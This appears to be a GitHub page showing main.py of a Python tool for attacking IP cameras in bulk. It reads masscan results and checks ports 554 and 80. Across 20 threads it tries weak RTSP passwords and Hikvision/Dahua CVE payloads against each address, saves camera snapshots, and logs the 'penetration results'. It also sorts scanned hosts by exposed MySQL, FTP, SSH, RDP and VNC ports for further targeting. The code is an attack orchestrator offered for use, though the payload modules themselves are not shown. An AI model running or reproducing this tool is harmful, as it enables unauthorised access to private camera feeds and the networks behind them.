-
Notifications
You must be signed in to change notification settings - Fork 19
/
main.py
161 lines (128 loc) · 4.46 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
# encoding=utf-8
from typing import Union
from pathlib import Path
import json
from threading import Lock
from concurrent.futures import ThreadPoolExecutor
from utils.runshell import run_cmd
from utils.log import logger
from utils.rtsp_easy_pwd import get_rtsp as easypwd_get_rtsp
from utils.check_port_open import Check_Port
from hikvision.payload import get_rtsp as hk_get_rtsp
from hikvision.payload import get_cve as hk_get_cve
from dahua.payload import get_rtsp as dh_get_rtsp
from dahua.payload import get_cve as dh_get_cve
basepath = Path(__file__).parent.absolute()
res_file = Path(basepath, "res.txt")
photo = Path(r"C:\Users\WhaleFall\Desktop", "py_photo")
photo.mkdir(exist_ok=True)
easy_rtsp = Path(photo, "easy_rtsp")
easy_rtsp.mkdir(exist_ok=True)
hk_rtsp = Path(photo, "hk_rtsp")
hk_rtsp.mkdir(exist_ok=True)
dh_rtsp = Path(photo, "dh_rtsp")
dh_rtsp.mkdir(exist_ok=True)
hk_cve = Path(photo, "hk_cve")
hk_cve.mkdir(exist_ok=True)
lock = Lock()
def handle_macsan_json(path: Union[Path, str]) -> None:
"""处理 macsan 的 json 数据"""
with Path(path).open(mode="r", encoding="utf8") as fp:
j_obj = json.loads(s=fp.read())
with Path(basepath, "sst.txt").open(mode="a", encoding="utf8") as r:
for j in j_obj:
ip = j["ip"]
r.write(ip+"\n")
def load_ips(path: Path = Path(basepath, "sst.txt")) -> list:
"""加载摄像头ip列表"""
with path.open(mode="r", encoding="utf8") as fp:
ctx = fp.read().split("\n")
ctx.sort(key=lambda x: ''.join(
[i.rjust(3, '0') for i in x.split('.')]), reverse=False)
return ctx
def save_res(msg):
"""保存渗透结果"""
with lock:
with res_file.open(mode="a", encoding="utf8") as fp:
logger.success(msg)
fp.write(msg+"\n")
def rtsp(ip: str) -> bool:
# 1. 检查554 rtsp端口是否开放
if not Check_Port(ip, 554):
logger.error(f"IP:{ip} rtsp端口未开放!")
return False
# 2. 开始 RTSP 弱密码!!
easy_res = easypwd_get_rtsp(ip, easy_rtsp)
if easy_res:
save_res(f"[+] {ip}存在{easy_res[1]}")
return True
elif hk_get_rtsp(ip, hk_rtsp):
save_res(f"[+] {ip}存在海康威视弱密码!")
return True
elif dh_get_rtsp(ip, dh_rtsp):
save_res(f"[+] {ip}存在大华弱密码!")
return True
else:
return False
def web(ip: str) -> bool:
# 13 检查80 web端口是否开放
if not Check_Port(ip, 80):
logger.error(f"IP:{ip} web80端口未开放!")
return False
# 4. 开始尝试 cve 漏洞!
if hk_get_cve(ip, hk_cve):
save_res(f"[+] {ip}存在海康威视漏洞!")
return True
elif dh_get_cve(ip):
save_res(f"[+] {ip}存在大华web漏洞!")
return True
else:
return False
def payload(ip: str):
"""针对单个摄像头的攻击"""
r = rtsp(ip)
w = web(ip)
if not (r or w):
logger.error(f"[-] {ip}无漏洞...")
return
def main():
with ThreadPoolExecutor(max_workers=20) as pool:
for ip in load_ips():
# payload(ip)
pool.submit(payload, ip)
def write_res(path: Path, msg):
with path.open(mode="a", encoding="utf8") as fp:
fp.write(msg+"\n")
def handle_macsan_json(path: Union[Path, str]) -> None:
"""处理 macsan 的 json 数据"""
with Path(path).open(mode="r", encoding="utf8") as fp:
j_obj = json.loads(s=fp.read())
p_3306 = Path(basepath, "p_3306.txt")
p_21 = Path(basepath, "p_21.txt")
p_22 = Path(basepath, "p_22.txt")
p_3389 = Path(basepath, "p_3389.txt")
p_5900 = Path(basepath, "p_5900.txt")
p_8080 = Path(basepath, "p_8080.txt")
for j in j_obj:
if j["ports"][0]["port"] == 3306:
write_res(p_3306, j["ip"])
elif j["ports"][0]["port"] == 21:
write_res(p_21, j["ip"])
elif j["ports"][0]["port"] == 22:
write_res(p_22, j["ip"])
elif j["ports"][0]["port"] == 3389:
write_res(p_3389, j["ip"])
elif j["ports"][0]["port"] == 5900:
write_res(p_5900, j["ip"])
elif j["ports"][0]["port"] == 8080:
write_res(p_8080, j["ip"])
else:
pass
if __name__ == "__main__":
# handle_macsan_json(Path(basepath, "allsst.json"))
# payload("10.1.6.100") # 正常获取
# payload("10.1.9.235") # 异常
# main()
# run_cmd("ping baidu.com")
handle_macsan_json(Path(basepath, "servserall.json"))
pass